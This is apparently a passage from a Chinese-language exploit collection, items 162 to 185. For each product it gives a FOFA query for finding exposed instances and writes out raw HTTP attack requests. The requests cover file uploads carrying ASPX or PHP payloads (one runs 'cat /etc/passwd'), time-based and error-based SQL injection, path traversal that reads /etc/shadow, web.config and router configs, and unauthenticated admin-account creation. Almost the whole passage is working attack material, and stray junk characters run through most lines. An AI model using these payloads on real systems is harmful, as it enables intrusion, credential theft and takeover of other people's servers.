' \+ R4 S, q1 ^: r" @<ip>1</ip>; ?8 F3 L6 {, L: c* u
<fileName>../../../../dizxdell.aspx</fileName>
$ a. k( ~8 |1 u' B2 k<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>* Y6 R3 a0 ]% {0 T# z6 _
<tag>3</tag>
/ R+ E" t* S9 T6 g7 a, N</UploadResume>
$ {0 s* x$ @0 q( D0 x" N</soap:Body>
; }" f. B" M( C* e0 g" q</soap:Envelope>
4 |/ I1 s8 t6 M- W% Q n4 c) v8 L0 x6 ~# J- O6 C
% }9 W; w) j2 p
http://x.x.x.x/dizxdell.aspx8 q2 Q& Z) V/ N- N/ t. Y9 Q
/ h8 ? n% r+ |; k9 \/ z" Q$ J' Q162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
, O1 s3 h x, N( w3 j9 `) j1 ?# f& dFOFA: app="和丰山海-数字标牌"' n4 Z6 v2 }( \' c& {
POST /QH.aspx HTTP/1.1$ Q7 v5 j( p- |; k. `
Host: x.x.x.x8 b1 Q# P d4 s; k9 i h, `8 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
' ^; r# L6 A, I* kConnection: close5 f1 ?" v$ U3 t% |5 D0 x; a
Content-Length: 583
& _! R( m1 W7 ~. oContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
8 O4 B' |1 P- [: B; c! h) S. Y& OAccept-Encoding: gzip$ @; X1 q0 P3 @8 f6 R! X5 t8 U
+ d0 b! E% Q$ X
------WebKitFormBoundaryeegvclmyurlotuey
' D3 q+ O# r- U2 d: [: _& N, C; ]/ ]. AContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
9 T5 w' y8 n, ~& k, z% h& ^& gContent-Type: application/octet-stream
7 e! {5 d3 n# r, s
) O2 p% g) y, r9 S<% response.write("ujidwqfuuqjalgkvrpqy") %>
3 E5 a1 g; V; ]9 @- A- |------WebKitFormBoundaryeegvclmyurlotuey
1 b2 r& k% j, }, wContent-Disposition: form-data; name="action"
, l D' ]5 w" a3 J: o8 y. k/ w; M0 C( G% p/ {6 `' p, Y) |
upload% l& E# `; G; P; z$ G1 B+ R1 J0 ]4 o
------WebKitFormBoundaryeegvclmyurlotuey
# C8 t; l8 i. n' S) ]9 H$ [Content-Disposition: form-data; name="responderId", K& P4 L" G" C) c. |8 y2 {; ]7 ^+ C
. x0 F9 { C3 mResourceNewResponder
' J. M) [ q* x X------WebKitFormBoundaryeegvclmyurlotuey
) P c0 F' e( t" G3 qContent-Disposition: form-data; name="remotePath"
6 o+ g! X. N( ~( {, L
9 A3 k' b( l5 t; X( d/ W/opt/resources
[" C$ M0 b5 ~- u------WebKitFormBoundaryeegvclmyurlotuey--2 ?- K* H8 z1 n$ H* S0 C) S* W4 n
3 r h+ P6 I7 U7 _& H# K
* e* f: @$ h% C9 c/ ~2 dhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
3 K( B+ j% X+ q8 o
7 ]8 \4 ^6 Q1 i. j5 L5 l163. 号卡极团分销管理系统 ue_serve.php 任意文件上传5 o7 h3 w# H% L9 M' f s
FOFA: icon_hash="-795291075"0 }" N' x6 _7 t; K8 [
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
- P3 U9 J* Y: y) V! N, BHost: x.x.x.x& o4 o1 G" y* Z* p P- k7 q& F0 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.365 o5 j, b9 g2 U1 z4 K& x
Connection: close
, F% N5 \/ S/ m3 J0 m7 vContent-Length: 2932 y) Z( R" _6 ^2 x$ E5 ~
Accept: */*
. o* Q+ I; K$ h; `7 QAccept-Encoding: gzip, deflate
% c9 c1 y5 Q9 C0 Q& S/ YAccept-Language: zh-CN,zh;q=0.9
6 j" g: N- K: M, i# g+ \" d+ EContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod1 G' l' M1 ~& q& h' e+ ?3 E
! C0 j- S3 [1 p# [# q, D5 c------iiqvnofupvhdyrcoqyuujyetjvqgocod
. ~; ?, K: |4 d ?0 h" jContent-Disposition: form-data; name="name"
2 X# o) k. B: f" S- S0 ?8 v( I& o1 S; W) a5 j' k# E
1.php3 e; G( x* ~3 j1 W
------iiqvnofupvhdyrcoqyuujyetjvqgocod
1 G0 G5 C% p4 u; ?5 tContent-Disposition: form-data; name="upfile"; filename="1.php"& z3 n! f* b! n u! ]
Content-Type: image/jpeg
) q! j Q; O' ~, r& f' P) T+ \" G4 w: `' |- u4 l) y8 ?
rvjhvbhwwuooyiioxega0 P: P" T T4 c7 U" {8 f- a9 b
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
+ k6 V. D C) g& q/ s( d
( q* H. ~8 o% {4 N
7 O: |2 E8 M) l- [" W5 D164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传. [; T; c8 f: A" f5 ]1 K( Z
FOFA: title="智慧综合管理平台登入"$ d) q' X3 b: B; }! i
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1% e; s' K& o: z
Host: x.x.x.x
4 R. f' }* @4 o7 Y+ m& |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0( b" N. K9 f( `* ?7 m9 a) j
Content-Length: 288
/ p; S6 Z9 m w0 K3 l! g) F5 rAccept: application/json, text/javascript, */*; q=0.01
* v! P+ D$ |% H7 X" E$ |% bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
# B% R1 } i4 W% VConnection: close6 J4 \8 D$ U% Y% U1 f
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
z& X5 c5 Z4 G1 S& K- ^X-Requested-With: XMLHttpRequest; R5 J' N/ f3 e
Accept-Encoding: gzip
0 C0 c; s! ?; O; e+ U6 f9 @- d$ M! s$ E& \& y
------dqdaieopnozbkapjacdbdthlvtlyl
/ I, a& N7 H# u5 UContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
3 J" y& D! y3 AContent-Type: image/jpeg
# G# ^9 q& G+ A* G
" @" Z/ p- `: D: E2 m' X<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
$ Q( K0 @4 b) s: G6 S' p------dqdaieopnozbkapjacdbdthlvtlyl--
. R/ c$ w. {8 U. I4 D! L' g
0 @1 ` I* x% w5 x/ n8 y4 o/ e% T- a# n
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
4 S- J3 @8 U+ @% r8 [8 b4 R
G+ B) ]; T) Q# ?. s' P& M165. OrangeHRM 3.3.3 SQL 注入
9 f2 r5 K+ h4 l0 J) oCVE-2024-36428% ~0 A1 c! b1 i3 _' D
FOFA: app="OrangeHRM-产品"
4 ?: V" I5 {* l/ _" CURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))- P O8 ?6 ]7 q0 d. B. D6 e0 m, z9 D
8 E8 I8 @' J0 P3 q- ^# r0 X
4 A; X: U5 p N9 K6 E1 m p
166. 中成科信票务管理平台SeatMapHandler SQL注入
% K. |* Z" l6 X; R$ X7 DFOFA:body="技术支持:北京中成科信科技发展有限公司"
j; F! N5 s' F9 x3 `# QPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
@8 }/ f3 |2 I0 _; a' f1 wHost:
$ @( A. d6 S, o5 @2 n jPragma: no-cache0 w6 `, g4 x8 G; L3 x
Cache-Control: no-cache: b( b! H3 U7 y2 S1 s& ?
Upgrade-Insecure-Requests: 10 L+ K! j) g' \) ?8 p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
! ] e& k- O% i5 q0 H7 x( M( }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* i& E3 A- z7 v4 z; D' `5 W
Accept-Encoding: gzip, deflate
: S3 ^3 F% U) fAccept-Language: zh-CN,zh;q=0.9,en;q=0.8( p4 T% |4 l3 U' y
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
7 R; E" z* O5 nConnection: close
1 p5 L$ b7 t& t3 i9 _* \" gContent-Type: application/x-www-form-urlencoded' L; k6 ^0 j x5 {
Content-Length: 89
9 m$ ]+ v: r: o% E' M& r" p# g9 s( e) j; X, }
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
: p% f& K0 L4 `) X' ]. i" L! \' E! u; q" I
& K6 _9 h% f8 Q5 F* g$ _$ a/ r3 g167. 精益价值管理系统 DownLoad.aspx任意文件读取/ v' i! k0 Z+ }/ t
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
- p: K1 V+ `( C! ]4 yGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1+ h# x* M; S( e: |" g8 G
Host:
1 B& E, i! ?. H9 o- sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) J" d- w) ^4 [
Content-Type: application/x-www-form-urlencoded
( C7 u0 `$ b5 {& nAccept-Encoding: gzip, deflate
# j) ^- e; i6 x" q: \Accept: */*% T/ L ^1 a* m, y# }% H% G" y8 Q
Connection: keep-alive
6 ?: I* E" j% t
( h9 g6 ^* Q0 K8 F. p* O9 e8 I8 r" @5 a
168. 宏景EHR OutputCode 任意文件读取
2 e; T7 e5 P* ~, t0 \' k' [# P) iFOFA:app="HJSOFT-HCM"# H2 A; Q7 o: O/ i
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
: ^7 B' _# @5 t* U3 i! GHost: your-ip, }+ C- H* Q( a' {1 R$ L- S. b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
" H+ D( A5 b& y) O9 c6 n, i) vContent-Type: application/x-www-form-urlencoded S% i" k3 t( U& V( q
Connection: close2 t8 e& E0 S( S* p: |4 w' I/ J4 V7 U @
" Z* k3 }4 f* _ p4 l5 y0 [# s! I' K6 M& g* y* U* K1 q" |% ~
) C4 s! R2 v7 [6 k4 U7 @- E
169. 宏景EHR downlawbase SQL注入
3 w$ A: n% D4 e; ?/ mFOFA:app="HJSOFT-HCM"
, i- K# Y6 ?, o1 mGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
5 J! F2 u' e' u, D2 jHost: your-ip
/ h( C- k6 I; yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ l3 `+ V: L# YAccept: */*
( b% q7 q1 W. S% n+ ?Accept-Encoding: gzip, deflate
% Q% C: I0 B2 Q7 h0 a) W5 eConnection: close
6 \/ e1 L D7 T$ a7 }0 u: J" j3 P/ e* _. Q! j
, `7 o5 |3 D$ Q8 p
, r K& x- Q: _2 o c- ]0 u
170. 宏景EHR DisplayExcelCustomReport 任意文件读取- U. x6 @; [( A& D* k/ r
FOFA:body="/general/sys/hjaxmanage.js"
* Y9 V$ j$ e! @$ a. {0 \; xPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
4 h9 D# p) |; e: dHost: balalanengliang6 T" Y K& e( S/ [& x2 b
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 u$ e7 f) y" m- D7 l* T
Content-Type: application/x-www-form-urlencoded+ P# S- V* i5 K+ {" |* O
, V: G7 q9 H' U9 G. Afilename=../webapps/ROOT/WEB-INF/web.xml
7 G; O& A O- f+ d& s
: J+ F. f& H: ?% M% y$ R6 i+ T* f, F# T/ Y: F
171. 通天星CMSV6车载定位监控平台 SQL注入
" g8 s' ^, w" D8 E% D6 TFOFA:body="/808gps/"
4 m, c. C9 }. Y9 R tGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
8 }' t+ B' {0 i0 T6 v& w9 ]2 I" |Host: your-ip7 a4 ~$ Z* N; H- \" E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
6 E7 {4 M" x$ l+ fAccept: */*
) |+ k4 T* q" UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' c+ D# t9 |6 [& Q( d$ xAccept-Encoding: gzip, deflate
; k9 s/ N8 b* c% i7 W$ ]5 w- \Connection: close% [2 y1 g i8 R! e4 {3 b- s
3 D# J+ O, m: h/ N) Z9 m0 v% D! z& J$ R* D: {' w7 {
# H2 ~3 A0 w& { {$ v+ b6 j, Q7 h1 Q0 m
172. DT-高清车牌识别摄像机任意文件读取6 ^! N# h/ y0 l# R: f+ v; C3 v& A1 h* N
FOFA:app="DT-高清车牌识别摄像机"
% ~+ K. N2 p$ \3 {GET /../../../../etc/passwd HTTP/1.13 w/ `& Z/ j+ `
Host: your-ip
3 R8 \! n# U A" sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 G2 C( \' R. Z/ l' X& v1 xAccept-Encoding: gzip, deflate0 D( s- Q. J% j- T0 W
Accept: */*+ {) }, H' l) e' A- h1 ]
Connection: keep-alive2 T6 I: ^$ `- ]% j) j8 b7 c' X
8 Z) S- y( v, Z* p- l) f, U, x; u/ L. C2 z7 e# @ C
h( V7 \0 ?; X. S c$ X, o4 G
173. Check Point 安全网关任意文件读取
8 r0 C' }- u# D' s2 Q5 u, F1 bCVE-2024-24919
' \% n. D" Z( A( Q$ |FOFA:app="Check_Point-SSL-Network-Extender": U$ M4 y* m) P7 P+ O+ s
POST /clients/MyCRL HTTP/1.11 L0 r. v9 `7 r; s' p1 t( M! D( k/ J
Host: your-ip+ d4 [5 [1 T, G3 T5 s" Y
Content-Type: application/x-www-form-urlencoded
+ c0 ^) s2 @7 C+ w) _
0 [9 E* ]2 B7 }3 f% H+ NaCSHELL/../../../../../../../etc/shadow. u4 v& d, |4 ~ n2 K& [1 ?7 j& M: j
2 J3 V5 f8 N2 s9 V& g2 [, u
& |6 m! N$ O4 s* s: C9 C5 ^, q6 ?4 [
174. 金和OA C6 FileDownLoad.aspx 任意文件读取( P; S+ |' F& w! g* K
FOFA:app="金和网络-金和OA"
7 T8 v0 V, F6 s) VGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1/ m. u1 l" E6 c# Q: [
Host: your-ip
1 b, k, N7 N5 I- q* ~. AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
4 F7 @+ [' s+ e1 p. ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 E* S% w e, V& e& X! Y6 d4 l
Accept-Encoding: gzip, deflate, br, ^) d1 o" W1 v7 b) K s
Accept-Language: zh-CN,zh;q=0.9
- J$ S W+ c, C4 QConnection: close
$ k' W* l' A8 |2 q# i, A5 S) `) f1 t1 m: `" ]/ [7 D2 [% l2 Z7 J4 [+ |
5 G* n g5 F m9 F
5 W; s. e2 q" G175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
) j& e1 e& [8 E: q8 p. ]& k; ?: B0 zFOFA:app="金和网络-金和OA") y3 [: K+ r$ m. o7 ]3 Z: c0 y
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
/ M& H( ^" R2 I* U4 hHost:9 V: e0 S# O E% I% ]8 x1 a8 Y8 Q
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
( B5 ?; J+ y: T+ zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 o4 p7 i; O K5 o4 CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 t' Y. ?5 j# H7 ^; F3 zAccept-Encoding: gzip, deflate
% j$ P% F" ?9 h; uConnection: close, _9 G. K: B6 [( K$ [ w
Upgrade-Insecure-Requests: 1
5 G+ q# r r! k5 H* p3 A& o
P1 G$ [& l9 j! A) W- P) E/ n! J. |: r z& g2 e4 e
176. 电信网关配置管理系统 rewrite.php 文件上传
* v- k! I9 Q0 x, Y. K; h% |FOFA:body="img/login_bg3.png" && body="系统登录"& S8 ]' v% Y6 V" Y
POST /manager/teletext/material/rewrite.php HTTP/1.1
1 R' h5 {: z: r3 @Host: your-ip7 ^+ }+ a1 `5 m2 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
0 y' e3 s. A9 z* S2 HContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
2 H' n" N1 F3 z. x4 W" WConnection: close
* b% H3 ~, |' L3 ^
! M$ e8 q, q P! M: d+ z------WebKitFormBoundaryOKldnDPT
0 J6 _! ?. }; O4 [Content-Disposition: form-data; name="tmp_name"; filename="test.php"
3 |1 m, D* w% P- _# JContent-Type: image/png% A& @+ U8 g' |" c5 h2 t
5 L6 \8 {1 G3 r3 d! A
<?php system("cat /etc/passwd");unlink(__FILE__);?>
! K1 J$ Q. L9 L/ n; l+ Y1 [------WebKitFormBoundaryOKldnDPT1 L5 Q6 `' k6 ~2 L4 z+ o& @( Q
Content-Disposition: form-data; name="uploadtime"* A' Q6 s! k0 A- O$ @7 X. w
2 _( w9 e! Z$ a6 I9 M
- A6 }* |+ s% V% i7 ?------WebKitFormBoundaryOKldnDPT--6 t& V- B! @6 p6 i3 L M
" L( z6 U% P; C* z: u/ N
3 W- g4 {- d# b R7 F' |7 l3 m( T3 b, z/ V
177. H3C路由器敏感信息泄露% ]) l) [# v9 p! x( o" Y \
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
! G; s, }/ {* e; @ u/userLogin.asp/../actionpolicy_status/../M60.cfg
3 h( B" D3 z. L1 p/userLogin.asp/../actionpolicy_status/../GR8300.cfg5 t1 A/ E; J$ F0 |
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
2 r3 j! A& S! I6 E/ k/userLogin.asp/../actionpolicy_status/../GR3200.cfg
8 m! B- R. Z- t4 e3 W/userLogin.asp/../actionpolicy_status/../GR2200.cfg
! i# v1 g$ ]5 M. F0 g/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg0 y% ~6 z/ i, f
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
. T, c& }2 v2 j2 l7 m/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg* v! G& F) L- |3 L3 ~
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg! f# w- B s: ?% K9 [' _
/userLogin.asp/../actionpolicy_status/../ER5200.cfg; x0 ~; N7 P8 I4 D( `" e
/userLogin.asp/../actionpolicy_status/../ER5100.cfg- e* J' r* M- b, d3 O
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg) j& j5 u" Q* f# ^+ A
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
1 X2 [! G& R" ^1 m0 U/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
% x+ K4 J, a! J$ X, I/ i9 c' w" U/userLogin.asp/../actionpolicy_status/../ER3200.cfg
& y7 L( o9 g" Z, p/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg3 N5 ^2 K) u1 @
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg6 q- t. Y- o! D- X/ M( q& t0 m6 y
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
* L W/ ^9 @$ k7 R/userLogin.asp/../actionpolicy_status/../ER3100.cfg
) p6 [ @' p ^6 Q8 }) y. A/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
1 E, t% w/ u" N* ^2 `3 ^) s6 E% G; k, I8 _& l; I6 ~
3 V0 h& @! \7 X( L178. H3C校园网自助服务系统-flexfileupload-任意文件上传. N# ?/ }2 \6 r% E& i7 o' I+ y- g' m
FOFA:header="/selfservice"
- ~ ~$ M0 E! K) ]7 LPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
+ d7 u ?0 }! B/ R0 Z$ n/ bHost:
* @0 a2 s! c7 }& m& U: XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
% W2 e; Y& S: S2 v6 r/ zContent-Length: 2520 d0 f3 z4 h# ^2 ]8 I3 [! k
Accept-Encoding: gzip, deflate
p" l% C( J4 t, \3 I4 `Connection: close& g9 Q- A& N, X d7 y
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
( ?( C9 L# u0 s. Y$ {5 c5 f-----------------aqutkea7vvanpqy3rh2l
; L. j- y% W% K; x" aContent-Disposition: form-data; name="12234.txt"; filename="12234"% }2 f9 c# o3 {
Content-Type: application/octet-stream
- Z' e+ t' m1 g' d% tContent-Length: 255! I' R* N. w+ V- X/ p, |' D" P
; O3 \/ m# a1 n& O q& B6 n s$ B
122342 O7 c3 r+ p2 @% J2 }. r
-----------------aqutkea7vvanpqy3rh2l--
. G0 `$ L6 z: f4 m# a
, l1 u; z: K9 d- \. Q0 R4 C* \: i& q V) D2 J$ v
GET /imc/primepush/%2e%2e/flex/12234.txt: i, c) z! o# |
O" W' _% p" S9 W8 E* w
. C; y' O; ~" |& G q3 Z8 j
179. 建文工程管理系统存在任意文件读取# I. i# `0 e/ E0 l& C5 c
POST /Common/DownLoad2.aspx HTTP/1.1; b% [9 n; v. X( ]# S. ~& Z
Host: {{Hostname}}! i& z# }) @$ J% A0 F7 v) p+ \
Content-Type: application/x-www-form-urlencoded1 e# m# I: R, B6 L
User-Agent: Mozilla/5.04 v0 |! P: f! }9 X7 C9 C
( J5 {8 K8 ? m# M2 J
path=../log4net.config&Name=
3 c5 [1 i; q( d: P4 v* {
3 \( P9 l+ V$ V, x ~9 r
' O7 \! }& i" X9 [: b5 ?180. 帮管客 CRM jiliyu SQL注入
" s2 b E h$ bFOFA:app="帮管客-CRM"
/ C8 s# h! v8 v5 L& u U- g! E# uGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
2 D# Y4 P3 D { \& _Host: your-ip
9 `" Q: v- K4 _7 B4 u5 y9 U% p6 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
0 B( l; j, p: ^/ `8 R2 S: V& SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 K6 z3 c! r8 I# JAccept-Encoding: gzip, deflate% M) Y+ s! }. d) e* V2 y v
Accept-Language: zh-CN,zh;q=0.9
! J; h5 I1 k1 V" rConnection: close
- x6 ^) u; d* O1 y
- U# r8 F6 o! \: x$ [5 A& V( `2 V5 W# m4 w( n* p/ T$ i, h4 M4 Y
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入" }2 ]% X! i+ X+ q! x9 S, D
FOFA:"PDCA/js/_publicCom.js"! w: n1 ~9 R; R! o( p- v
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1, ^" N8 k7 m$ D5 f0 a( ?
Host: your-ip
1 J3 z- S( l2 F' @+ CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
: x* ~+ d! u# S2 PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% X9 L, c+ {$ O- z; X" K
Accept-Encoding: gzip, deflate, br
% f) P( v. B0 z% VAccept-Language: zh-CN,zh;q=0.9
' j8 }7 N" l4 u, c5 ]Connection: close: ?2 C1 a/ X+ Y1 g8 i5 Z
Content-Type: application/x-www-form-urlencoded
. [( k0 T; _; f) l$ E3 |. c5 l' v9 W! N' Y( I+ [ P, w/ u' f, e& |. d
# t g0 r; w& X: v/ {6 p. {action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
7 H o0 b a( |+ k8 s9 g) l( P' X0 B9 l" q
" H8 [5 W0 [9 t8 b% X* C& ?
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建% y: }1 P- B' i( k2 Q" u
FOFA:"PDCA/js/_publicCom.js"
4 C( S0 j( W( v- I- e/ PPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
! ]& {1 F* y8 @( n. o0 AHost: your-ip
\- Y6 r4 y6 u& r/ E1 m" c2 w/ ^! MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
* A( j$ q! D7 w1 \# i4 G$ H5 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# W- Y0 C: B HAccept-Encoding: gzip, deflate, br5 R/ Q0 K; a/ W; s U; O I6 w
Accept-Language: zh-CN,zh;q=0.91 J; b$ m/ ^+ Q4 e9 K) p/ C* a
Connection: close
4 H6 p# k/ Z9 D; J! LContent-Type: application/x-www-form-urlencoded$ {8 r4 C& \6 L) g& h) o, N' b. q
) Q6 ^6 c% R6 l# H# [% B6 ^
# T. e; H: y: I S# Zusername=test1234&pwd=test1234&savedays=1
/ `" |6 |) a* M k3 c
6 s, c& a J9 }7 P
: z% S7 F* b) w. q183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
$ o: G+ M& j, D. {, R) u7 ?+ [FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
# R6 l# O6 P/ V9 X/ c" J+ @GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.15 G7 b s/ {! D$ Y! c) o5 n
Host: your-ip
- E0 f* i- j: C' lUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36) n8 n' B5 E! O2 a3 Y6 U4 f4 K8 M
Accept-Charset: utf-88 h! {. m4 q+ E0 Y. J1 F$ W
Accept-Encoding: gzip, deflate5 p1 Q; Y a. h
Connection: close8 Y0 h+ i0 Y) ~5 f
5 t- [- G& e& k9 U0 S
2 y( `/ ~& ?. Z# c5 F: n0 z184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
! d* s: W* y# _- \ ~0 KFOFA:server="SunFull-Webs"' L8 b& W1 }$ `3 M2 u- m4 R
POST /soap/AddUser HTTP/1.1
* Q/ B% ^! t" R3 {6 ~: U# xHost: your-ip) o4 ~7 M& r2 k7 t0 v7 @
Accept-Encoding: gzip, deflate
, e6 k- ^! P, r; y6 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
3 ^' R- ?" h% l; H5 _7 A1 }! \# @Accept: application/xml, text/xml, */*; q=0.015 @( Z+ a5 g4 [" K1 S: b
Content-Type: text/xml; charset=utf-8
' }; s g9 F7 X% FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% ~4 o9 u; n Q5 D" W8 C
X-Requested-With: XMLHttpRequest
4 F+ b) L' U9 }9 H; V/ l8 L2 x5 Z. R3 V4 f6 @3 @ O. i- G
9 n7 K. e/ m5 }: Y; ]2 pinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56'). k' c2 M% ]5 Q2 o& m* y
, l( W, W8 {3 r4 \
9 T# W4 y$ a) U! F" J6 n( z185. 瑞友天翼应用虚拟化系统SQL注入
